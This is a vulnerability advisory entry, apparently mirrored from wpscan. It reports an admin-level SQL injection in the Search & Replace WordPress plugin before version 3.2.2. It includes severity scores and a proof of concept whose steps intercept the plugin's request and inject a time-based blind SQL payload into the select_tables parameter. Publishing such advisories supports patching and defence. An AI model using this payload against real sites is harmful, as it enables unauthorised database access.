Lucene search

K
wpvulndbKrugov AryomWPVDB-ID:7D5B8764-C82D-4969-A707-F38B63BCADCA
HistoryMay 23, 2024 - 12:00 a.m.

Search & Replace < 3.2.2 - Admin+ SQL injection

2024-05-2300:00:00
Krugov Aryom
wpscan.com
1
plugin
sql injection
vulnerability
poc
june 06 2024

7.2 High

AI Score

Confidence

High

0.0004 Low

EPSS

Percentile

9.1%

Description The plugin does not sanitize and escape a parameter before using it in a SQL statement, allowing admins to perform SQL injection attacks (such as within a multi-site network).

PoC

1. Go to the Tools parameter 2. Select Search & Replace 3. Click “Do Search & Replace” 4. Change the parameters and intercept the request 5. Put a vulnerable SQL query in the request, such as the following: search=123&amp;replace;=1&amp;csv;=1&amp;select;_tables%5B%5D=(SELECT+9255+FROM+(SELECT(SLEEP(1-(IF(44=44,0,5)))))cCQl)&amp;export;_or_save=1&amp;action;=search-replace&amp;search-submit;=123123"asdasd=''&amp;insr;_nonce=0590310227&_wp_http_referer=%2Fwp-admin%2Ftools.php%3Fpage%3Dsearch-replace 6. Notice that the response takes double seconds of the SLEEP(x-) number you insert.

CPENameOperatorVersion
eq3.2.2

7.2 High

AI Score

Confidence

High

0.0004 Low

EPSS

Percentile

9.1%

Related for WPVDB-ID:7D5B8764-C82D-4969-A707-F38B63BCADCA